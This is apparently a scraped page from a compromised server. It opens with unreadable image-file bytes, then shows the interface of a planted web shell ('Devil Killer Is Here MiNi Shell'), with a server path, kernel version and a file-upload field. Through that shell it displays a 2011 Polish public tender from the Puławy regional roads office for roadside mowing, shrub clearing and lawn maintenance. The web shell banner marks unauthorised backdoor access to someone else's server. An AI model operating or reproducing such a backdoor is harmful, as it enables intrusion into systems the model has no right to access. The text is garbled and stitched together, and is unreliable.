JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110222/61225-N-2011.html

<p class="kh_header"><b>Puławy: Koszenie traw i chwastów, wycinka samosiejek oraz utrzymanie trawników położonych wzdłuż dróg wojewódzkich nr: 738, 741, 743, 747, 755, 759, 801, 817, 824, 825, 826, 830, 831, 832, 845, 851, 854, 855, 857, 860, 900</b><br>
<b>Numer ogłoszenia: 61225 - 2011; data zamieszczenia: 22.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie - Rejon Dróg Wojewódzkich w Puławach , ul. Składowa 1A, 24-100 Puławy, woj. lubelskie, tel. 081 8863163, 8864103, faks 081 8863163.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Koszenie traw i chwastów, wycinka samosiejek oraz utrzymanie trawników położonych wzdłuż dróg wojewódzkich nr: 738, 741, 743, 747, 755, 759, 801, 817, 824, 825, 826, 830, 831, 832, 845, 851, 854, 855, 857, 860, 900.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Usługą objęto:
Zadanie nr 1 - Koszenie traw i chwastów z poboczy dróg wojewódzkich nr 738, 741, 743, 801, 824, 826, 830, 832, 845, 860 na terenie Obwodu Drogowego w Puławach z wyłączeniem miast: Puławy, Nałęczów i Dęblin
Zakres usług obejmuje:
a. koszenie obustronne, w ciągu roku, w okresie od  kwietnia do września 2011 r. w maksymalnej ilości  209,80 ha;
b. usunięcie przed każdym koszeniem zanieczyszczeń takich jak kamienie, gruz, puszki, butelki itp. i wywiezienie ich na składowisko odpadów  
c. koszenie ręczne oraz z użyciem kosiarek bijakowych całej szerokości pasa drogowego, z uwzględnieniem poboczy, rowów, skarp, przeciwskarp oraz wykoszenie wlotów skrzyżowań z drogami o nawierzchni bitumicznej na dł. 20 m). Przyjęte szerokości koszenia zawiera załącznik I - przedmiar usług . 
d. ręczne koszenie w miejscach niedostępnych tj. przy słupkach znaków drogowych,  słupkach prowadzących, barierach energochłonnych itp. Zakres usługi obejmuje również wykoszenie do wymaganej szerokości terenu za barierami drogowymi
e. zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
f. wykaz powierzchni objętych koszeniem na poszczególnych drogach RDW przedstawia Załącznik I Przedmiar usług. 
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Wykonawca zrealizuje zlecony protokołem zakres usług w terminie 14 dni od daty przekazania pasa drogowego. Zamawiający zastrzega sobie możliwość zmniejszenia zakresu koszenia. 
Usługi należy wykonać zgodnie z opisem i Specyfikacją Techniczną w sposób  gwarantujący należytą jakość.
Zadanie nr 2 - Koszenie traw i chwastów z poboczy dróg wojewódzkich nr 747, 755, 759, 817, 824, 825, 854, 855, 857, 900 na terenie Obwodu Drogowego w Annopolu z wyłączeniem miasta Opole Lubelskie
Zakres usług obejmuje:
a. koszenie obustronne w ciągu roku w okresie od  kwietnia do września 2011 r. w maksymalnej ilości  214,68 ha;
b. usunięcie przed każdym koszeniem zanieczyszczeń takich jak kamienie, gruz, puszki, butelki itp. i wywiezienie ich na składowisko odpadów  
c. koszenie ręczne oraz z użyciem kosiarek bijakowych całej szerokości pasa drogowego, z uwzględnieniem poboczy, rowów, skarp, przeciwskarp oraz wykoszenie wlotów skrzyżowań z drogami o nawierzchni bitumicznej na dł. 20 m). Przyjęte szerokości koszenia zawiera załącznik I - przedmiar usług. 
d. ręczne koszenie w miejscach niedostępnych tj. przy słupkach znaków drogowych,  słupkach prowadzących, barierach energochłonnych itp. Zakres usługi obejmuje również wykoszenie do wymaganej szerokości terenu za barierami drogowymi
e. Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
f. wykaz powierzchni objętych koszeniem na poszczególnych drogach RDW przedstawia Załącznik I Przedmiar usług. 
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Wykonawca zrealizuje zlecony protokołem zakres usług w terminie 14 dni od daty przekazania pasa drogowego. Zamawiający zastrzega sobie możliwość zmniejszenia zakresu koszenia. 
Usługi należy wykonać zgodnie z opisem i Specyfikacją Techniczną w sposób  gwarantujący należytą jakość.
Zadanie nr 3 - Utrzymanie trawników położonych wzdłuż dróg wojewódzkich nr 801, 824 i 851 na terenie miasta Puławy
Zakres usług obejmuje:
a. Koszenie trawników wraz z  wygrabieniem skoszonej trawy i wywozem jej na składowisko odpadów - siedmiokrotnie w okresie kwiecień - październik 2011 na powierzchni 5,57 ha;
b. Jednokrotne  wiosenne  porządkowe wygrabienie trawników z wywozem wygrabionych nieczystości i resztek roślin na składowisko odpadów w okresie marzec - kwiecień 2011 na powierzchni 5,57 ha; 
c. Dwukrotne jesienne porządkowe grabienie trawników w wywozem wygrabionych liści, nieczystości i resztek roślin na składowisko odpadów w okresie  wrzesień - listopad 2011  na powierzchni  5,57 ha;
d. Dwudziestokrotne zebranie śmieci i nieczystości z terenu trawników z wywiezieniem ich na składowisko odpadów w okresie kwiecień - listopad 2011r.
e. Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
f. Wykaz powierzchni na poszczególnych ulicach przedstawia załącznik I - przedmiar usług.
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Wykonawca zrealizuje zlecony protokołem zakres usług w terminie 14 dni od daty przekazania pasa drogowego. 
Usługi należy wykonać zgodnie z opisem i Specyfikacją Techniczną w sposób  gwarantujący należytą jakość.
Zamawiający zastrzega sobie możliwość:
a) zmniejszenia krotności poszczególnych usług,
b) przesunięcia ilości usług między asortymentami
Zadanie nr 4 - Utrzymanie trawników położonych wzdłuż dróg wojewódzkich  nr 826 i 830 na terenie miasta Nałęczów
Zakres usług obejmuje:
a. Koszenie trawników wraz z  wygrabieniem skoszonej trawy i wywozem jej na składowisko odpadów - siedmiokrotne w okresie kwiecień - październik 2011 na powierzchni 3,18 ha;
b. Jednokrotne  wiosenne  porządkowe wygrabienie trawników z wywozem wygrabionych nieczystości i resztek roślin na składowisko odpadów w okresie marzec - kwiecień 2011 na powierzchni 3,18 ha; 
c. Dwukrotne jesienne porządkowe grabienie  trawników w wywozem wygrabionych liści, nieczystości i resztek roślin na składowisko odpadów w okresie  wrzesień - listopad 2011  na powierzchni  3,18 ha;
d. Dwudziestokrotne zebranie śmieci i nieczystości z terenu trawników z wywiezieniem ich na składowisko odpadów w okresie kwiecień - listopad 2011r.
e. Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
f. Wykaz powierzchni na poszczególnych ulicach przedstawia załącznik I - przedmiar usług
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Wykonawca zrealizuje zlecony protokołem zakres usług w terminie 14 dni od daty przekazania pasa drogowego. 
Usługi należy wykonać zgodnie z opisem i Specyfikacją Techniczną w sposób  gwarantujący należytą jakość.
Zamawiający zastrzega sobie możliwość:
a) zmniejszenia krotności poszczególnych usług,
b) przesunięcia ilości usług między asortymentami
Zadanie nr 5 - Utrzymanie trawników położonych wzdłuż dróg wojewódzkich  nr 801 i 831 na terenie miasta Dęblin
Zakres usług obejmuje:
a. Koszenie trawników wraz z wygrabieniem skoszonej trawy i wywozem jej na składowisko odpadów - siedmiokrotnie w okresie kwiecień - październik 2011 na powierzchni 1,90 ha;
b. Jednokrotne wiosenne porządkowe wygrabienie trawników z wywozem wygrabionych nieczystości i resztek roślin na składowisko odpadów   w okresie marzec - kwiecień 2011 na powierzchni 1,90 ha;
c. Dwukrotne jesienne porządkowe grabienie trawników w wywozem wygrabionych liści, nieczystości i resztek roślin na składowisko odpadów w okresie wrzesień - listopad 2011  na powierzchni  1,90 ha;
d. Dwudziestokrotne zebranie śmieci i nieczystości z terenu trawników z wywiezieniem ich na składowisko odpadów w okresie kwiecień - listopad 2011r.
e. Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
f. Wykaz powierzchni na poszczególnych ulicach przedstawia załącznik I - przedmiar usług
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Wykonawca zrealizuje zlecony protokołem zakres usług w terminie 14 dni od daty przekazania pasa drogowego. 
Usługi należy wykonać zgodnie z opisem i Specyfikacją Techniczną w sposób  gwarantujący należytą jakość.
Zamawiający zastrzega sobie możliwość:
a) zmniejszenia krotności poszczególnych usług,
b) przesunięcia ilości usług między asortymentami
Zadanie nr 6 - wycinka samosiejek rosnących wzdłuż dróg wojewódzkich nr 747, 824, 825 i 857 na terenie Obwodu Drogowego w Annopolu
Zakres usług obejmuje wycinkę krzewów i samosiejek na drogach nr :747, 824, 825 i 857, na łącznej powierzchni 1,92 ha, przy zakrzewieniu - porośnięciu gęstym.        
Usługi polegać będą na:
a. wycince krzewów i samosiejek w wieku do 10 lat na wskazanych drogach, na całej szerokości pasa drogowego, z uwzględnieniem poboczy, skarp, rowów oraz przeciwskarp; szczegółowy wykaz odcinków objętych usługą zawiera załącznik I - przedmiar usług  
b. uprzątnięciu z pasa drogowego wyciętych krzaków i samosiejek, które stanowią własność Wykonawcy poprzez rozdrobnienie w rębakach lub wywóz na składowisko odpadów. Zabrania się palenia wyciętych krzewów i samosiejek na miejscu robót.    
c. realizacji prac zgodnie ze Specyfikacją Techniczną.
d. zapewnieniu, w rejonie prowadzonych prac bezpiecznych warunków ruchu  drogowego i pieszego zgodnie z zatwierdzonym projektem czasowej organizacji ruchu, przekazanym przez Zamawiającego 
Zamawiający zastrzega sobie możliwość zmniejszenia ilości usług,
Zadanie nr 7 - wycinka samosiejek rosnących wzdłuż drogi wojewódzkiej nr 743 na terenie Obwodu Drogowego w Puławach
Zakres usług obejmuje wycinkę krzewów i samosiejek na drodze nr 743, na łącznej powierzchni 2,27 ha, przy zakrzewieniu - porośnięciu gęstym.        
Usługi polegać będą na:
a. wycince krzewów i samosiejek w wieku do 10 lat na wskazanej drodze, na całej szerokości pasa drogowego, z uwzględnieniem poboczy, skarp, rowów oraz przeciwskarp; szczegółowy wykaz odcinków objętych usługą zawiera załącznik I - przedmiar usług  
b. uprzątnięciu z pasa drogowego wyciętych krzaków i samosiejek, które stanowią własność Wykonawcy poprzez rozdrobnienie w rębakach lub wywóz na składowisko odpadów. Zabrania się palenia wyciętych krzewów i samosiejek na miejscu robót.    
c. realizacji prac zgodnie ze Specyfikacją Techniczną.
d. zapewnieniu, w rejonie prowadzonych prac bezpiecznych warunków ruchu  drogowego i pieszego zgodnie z zatwierdzonym projektem czasowej organizacji ruchu, przekazanym przez Zamawiającego 
Zamawiający zastrzega sobie możliwość zmniejszenia ilości usług,
2. Zamawiający dopuszcza możliwość składania ofert częściowych na pojedyncze zadania. Wykonawca może złożyć ofertę na wykonanie jednego lub więcej zadań, wybranych przez siebie spośród zadań wyszczególnionych w pkt. III.
3. Zgodnie z art. 30 ust. 4 ustawy Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego usługi spełniają wymagania określone przez Zamawiającego (art. 30, ust. 5 ustawy).
Wartość zamówienia - 421 375,53 zł netto.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5, 77.34.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jezeli przepisy prawa nakładają obowiązek ich posiadania, Wykonawca załączy do oferty Oświadczenie potwierdzające spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę polegającą na 
a. w przypadku składania oferty na zadanie nr 1 lub 2 - koszeniu poboczy dróg, nasypów, skarp, przeciwskarp, rowów przydrożnych, pasów drogowych, wałów ochronnych, o wartości minimum 30 000,00 zł brutto,
b. w przypadku składania oferty na zadanie nr 3, 4 lub 5 - koszeniu trawników lub terenów wymienionych w pkt. a., o wartości minimum 3 000,00 zł brutto,
c. w przypadku składania oferty na zadanie nr 6 lub 7 - wycince krzewów lub samosiejek, o wartości minimum 20 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym niezbędnym do wykonania zamówienia Wykonawca winien wykazać,  iż na czas realizacji zamówienia będzie dysponował jednostkami sprzętu wymienionymi poniżej :
a. w przypadku składania oferty na zadanie nr 1 :  
- Kosiarki bijakowe doczepne lub na wysięgniku wraz z nośnikami o możliwości koszenia odrostów i samosiejek o średnicy do 3 cm  - 2 szt.,
- Kosy spalinowe - 3 szt.,
b. w przypadku składania oferty na zadanie nr 2 :  
- Kosiarki bijakowe doczepne lub na wysięgniku wraz z nośnikami o możliwości koszenia odrostów i samosiejek o średnicy do 3 cm  - 2 szt.,
- Kosy spalinowe - 3 szt.,
c. w przypadku składania oferty na zadanie nr 3, 4 lub 5, niezależnie od ilości wybranych zadań (spośród 3,4,5):
- Kosiarki spalinowe - 2 szt.,
- Kosy spalinowe - 4 szt.,
- Ciągnik z przyczepą dostosowaną do wywozu trawy i liści - 1 szt.
d. w przypadku składania oferty na zadanie nr 6 lub 7, niezależnie od ilości wybranych zadań (spośród 6,7):
- Piły mechaniczne - 4 szt.,
-Narzędzia tnące (sekatory, nożyce, itp.) - 4 szt.,
- Rębak do rozdrabniania lub samochód o ład. min. 3,5 t lub ciągnik z przyczepą do zrębkowania lub wywozu wyciętych krzewów i samosiejek - 1 szt.
e. w przypadku składania oferty na więcej, niż jedno zadanie, Wykonawca musi wykazać, że dysponuje ilością sprzętu, stanowiącą sumę sprzętu wymaganego dla poszczególnych zadań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zmówienia, Wykonawca załączy do oferty Oświadczenie potwierdzające spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku sytuacji ekonomicznej i fonansowej, Wykonawca załączy do oferty Oświadczenie potwierdzające spełnianie warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający, zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, polegających na:
a. Zmianie terminu wykonania umowy w przypadku wystąpienia niekorzystnych warunków atmosferycznych, powodujących wstrzymanie prac przynajmniej przez osiem godzin w ciągu doby (długotrwałych, obfitych opadów deszczu lub śniegu itp.) uniemożliwiających wykonanie usługi zgodnie ze Specyfikacją Techniczną. Termin wykonania umowy wydłuża się o liczbę dni, w których warunki atmosferyczne uniemożliwiają prowadzenie prac, ilość tych dni określa osoba nadzorująca z ramienia Zamawiającego, sporządzając stosowny protokół. 
b. Zmianie wynagrodzenia w przypadku, gdy zmianie ulegnie stawka podatku VAT.  
2. W razie zaistnienia istotnej zmiany okoliczności, powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl<br>
